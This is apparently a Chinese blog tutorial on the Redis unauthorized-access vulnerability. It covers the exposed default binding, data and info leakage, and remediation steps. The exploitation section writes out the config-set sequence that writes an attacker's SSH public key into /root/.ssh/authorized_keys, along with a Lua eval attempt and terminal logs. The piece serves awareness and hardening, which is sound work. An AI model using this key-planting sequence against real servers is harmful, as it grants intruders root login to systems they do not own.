Redis未授权访问漏洞

1. Redis简介
2. 漏洞概述
3. 漏洞利用方式
4. 修复方式
  1. Redis简介

Redis简介

  1. 漏洞概述

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器

  • 0x1: 漏洞描述

Redis安全模型的观念是: "请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的"Redis 作者之所以放弃解决未授权访问导致的不安全性是因为

  1. 99.99%使用Redis的场景都是在沙盒化的环境中,为了0.01%的可能性增加安全规则的同时也增加了复杂性

  2. 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的
    因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器

  • 0x2: 漏洞利用条件
1. redis服务以root账户运行
2. redis无密码或弱密码进行认证
3. redis监听在0.0.0.0公网上

记一次Redis被攻击的事件

  1. 漏洞利用方式
  • 0x1: 数据库数据泄露
Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等

  • 0x2: 任意代码执行
Redis可以嵌套Lua脚本的特性将会导致代码执行

redis-cli eval "$(echo hacker /tmp/shell)" 0

0x3: 敏感信息泄露

通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫

# Server
redis_version:2.8.13
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:161beea97cb9b816
redis_mode:standalone
os:Linux 2.6.32-431.23.3.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:12537
run_id:977eace0aacf7c702db5ff0b689cf23cf0936dbc
tcp_port:6379
uptime_in_seconds:17725
uptime_in_days:0
hz:10
lru_clock:4493657
config_file:

# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0

# Memory
used_memory:810968
used_memory_human:791.96K
used_memory_rss:2359296
used_memory_peak:810968
used_memory_peak_human:791.96K
used_memory_lua:36864
mem_fragmentation_ratio:2.91
mem_allocator:jemalloc-3.6.0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1447333284
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok

# Stats
total_connections_received:5
total_commands_processed:5
instantaneous_ops_per_sec:0
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:1
keyspace_misses:1
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:233

# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:10.47
used_cpu_user:7.25
used_cpu_sys_children:0.00
used_cpu_user_children:0.00

# Keyspace
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> keys *
(error) ERR operation not permitted
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# redis-cli -h 127.0.0.1 -p 6379 -a littlehann  
127.0.0.1:6379> keys *
(empty list or set)
127.0.0.1:6379> 
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 -a littlehann
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli 
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379> eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
127.0.0.1:6379> EVAL "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'EVAL'
127.0.0.1:6379> info
redis_version:2.4.10
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:12766
uptime_in_seconds:3970
uptime_in_days:0
lru_clock:30359
used_cpu_sys:0.46
used_cpu_user:0.73
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:1
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
used_memory:726176
used_memory_human:709.16K
used_memory_rss:1634304
used_memory_peak:726168
used_memory_peak_human:709.15K
mem_fragmentation_ratio:2.25
mem_allocator:jemalloc-2.2.5
loading:0
aof_enabled:0
changes_since_last_save:0
bgsave_in_progress:0
last_save_time:1447334503
bgrewriteaof_in_progress:0
total_connections_received:7
total_commands_processed:4
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master

0x4: 上传SSH公钥获得SSH登录权限

1. 首先在本地生产公私钥文件:
ssh-keygen –t rsa

2. config set dir /root/.ssh/
3. config set dbfilename authorized_keys
4. set xxxx "\n\n\nssh-rsa key_pub\n\n\n",其中key_pub为上一步生成的公钥,即可将公钥保存在远端服务器,使得登录时不需要输入账号与密码

Redis未授权访问配合SSH key文件利用分析:ZoomEye全球最新独家数据 V2

  1. 修复方式
1. redis.conf: bind 127.0.0.1
//redis本来就是作为内存数据库,只要监听在本机即可

2. 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中
3. 限定可以连接Redis服务器的IP
4. 修改Redis默认端口6379
5. 配置rename-command配置项"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度 
6. 禁止使用 root 权限启动 redis 服务

Redis未授权访问导致可远程获得服务器权限

来源

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,123评论 6 490
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,031评论 2 384
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,723评论 0 345
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,357评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,412评论 5 384
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,760评论 1 289
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,904评论 3 405
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,672评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,118评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,456评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,599评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,264评论 4 328
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,857评论 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,731评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,956评论 1 264
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,286评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,465评论 2 348

推荐阅读更多精彩内容

  • ** 一、漏洞描述和危害 **Redis因配置不当可以未授权访问,被攻击者恶意利用。攻击者无需认证访问到内部数据,...
    是Jonathan阅读 7,736评论 0 2
  • 来源:http://bbs.ichunqiu.com/thread-9199-1-1.html?from=ch 漏...
    池寒阅读 1,111评论 0 2
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,628评论 18 139
  • 没有机会见证奇迹,还是输了。 路漫漫其修远兮,天花板上裂痕再多,也还不到穿破的时候。虽然相信这一天总会来,但很可惜...
    ritaxqzhang阅读 347评论 0 0
  • 2017年6月23日 星期五 不平静的一天 很高兴迈出了第一步来到此次的开心大团队的首期特训营。 早上各种任务的轰...
    雪媚阅读 369评论 0 0